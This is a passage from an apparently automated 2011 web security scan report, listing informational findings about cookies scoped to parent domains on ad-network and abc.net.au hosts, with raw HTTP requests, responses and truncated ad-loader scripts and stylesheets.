X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023677.799695.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 548
Date: Wed, 07 Sep 2011 14:14:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:49 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script language="JavaScript" type="text\/javascript">document.write(\'<script language="JavaScript" src="http:\/\/optimized-by.rubiconproject.com\/a\/dk.js?defaulting_ad=i3333333136
...[SNIP]...

8.51. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023906.799696.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:35 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 679
Date: Wed, 07 Sep 2011 14:14:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:35 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- Site: Fairfax Digital Partner: Advertising.com Size: 728x90 -->\r\n<script language="javascript" type="text\/javascript">\r\n var dkcb = Math.random();\r\n document.write(
...[SNIP]...

8.52. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.8213596055284142&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023906.799696.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:15:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 679
Date: Wed, 07 Sep 2011 14:15:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:31 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- Site: Fairfax Digital Partner: Advertising.com Size: 728x90 -->\r\n<script language="javascript" type="text\/javascript">\r\n var dkcb = Math.random();\r\n document.write(
...[SNIP]...

8.53. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1069538.801645.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 995
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:10 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019757/direct/01/7542530158?click=http://r1-ads.ace.advertising.com/click/site=0000801645/mnum=0001069538/cstr=18256183=_4e677c31,754253
...[SNIP]...

8.54. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.905406.801647.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 898
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:13 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script type="text/javascript">document.write(\'<ifr\'+\'ame width="300" height="250" src="http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=
...[SNIP]...

8.55. http://rc.d.chango.com/m/rc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rc.d.chango.com
Path:   /m/rc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/rc HTTP/1.1
Host: rc.d.chango.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://pixel.rubiconproject.com/tap.php?expires=30&nid=2245&put=b6ae888c-d95b-11e0-b096-0025900e0834&v=7727
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Sat, 04 Sep 2021 14:14:35 GMT; Path=/
Set-Cookie: _i_rc=1; Domain=chango.com; expires=Wed, 14 Sep 2011 14:14:35 GMT; Path=/
Connection: close


8.56. http://rp.gwallet.com/r1/ruum

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /r1/ruum

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/ruum HTTP/1.1
Host: rp.gwallet.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://pixel.rubiconproject.com/tap.php?v=7935&nid=2271&expires=30&put=DUSYkUQpjy1LEYeYEnMS6srZRiE
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=j5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=19; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1


8.57. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/?rt=iframe HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 07 Sep 2011 14:14:43 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
Set-Cookie: dq=3|3|0|0; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
Set-Cookie: put_2101=""; Domain=.rubiconproject.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lm="7 Sep 2011 14:14:43 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


8.58. http://tap.rubiconproject.com/oz/feeds/targus/profile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; dq=2|2|0|0; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^2

Response

HTTP/1.1 204 No Content
Date: Wed, 07 Sep 2011 14:15:54 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
Set-Cookie: dq=98|98|0|0; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
Set-Cookie: lm="7 Sep 2011 14:15:54 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.59. http://user.lucidmedia.com/clicksense/user

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=9ce688505699aefa&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:19 GMT
Expires: Wed, 07 Sep 2011 14:14:19 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh09/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4214&nid=1197&put=3620501663059719663&expires=30
Content-Length: 0
Connection: close


8.60. http://www.abc.net.au/includes/scripts/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /includes/scripts/global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/scripts/global.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 10 Aug 2011 05:58:03 GMT
ETag: "11d7ab-4df7-5d0310c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=54212
Expires: Thu, 08 Sep 2011 05:17:45 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 19959
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853301; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au


// Assigns webtrends groups to pages by hostname or top level directory.
// Geoff Pack, June 2008
// last modified May 2011

var abcHost = location.host;
if (location.host.indexOf('www.') == 0) abcHo
...[SNIP]...

8.61. http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/house_ads_m12.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/house_ads_m12.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 20 May 2011 01:57:21 GMT
ETag: "3c7da1-1b97-7136e240"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 7063
Cache-Control: max-age=9814
Expires: Wed, 07 Sep 2011 16:57:47 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853207; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

.house_ads .image {
   margin: 0 10px 0 0;
}

.house_ads .image .caption {
   display: none;
}    

.house_ads .text {
   margin: 0 0 10px 0;
}

.house_ads .text .heading {
   margin: 3px 0 10px 0;
...[SNIP]...

8.62. http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/latest_media_m21.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/latest_media_m21.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 00:14:29 GMT
ETag: "13e5575-474-fc3ca340"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 1140
Cache-Control: max-age=54192
Expires: Thu, 08 Sep 2011 05:17:25 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853217; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

#latest_media {
margin-bottom: 20px;
}

#latest_media .title h2 {
padding: 0 0 5px 0;
}

#latest_media .tabslm {
width: 220px;
